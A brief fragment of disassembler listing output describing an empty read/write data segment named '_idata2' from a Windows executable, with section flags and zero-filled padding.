; Offset to raw data for section: 00030000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 430000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start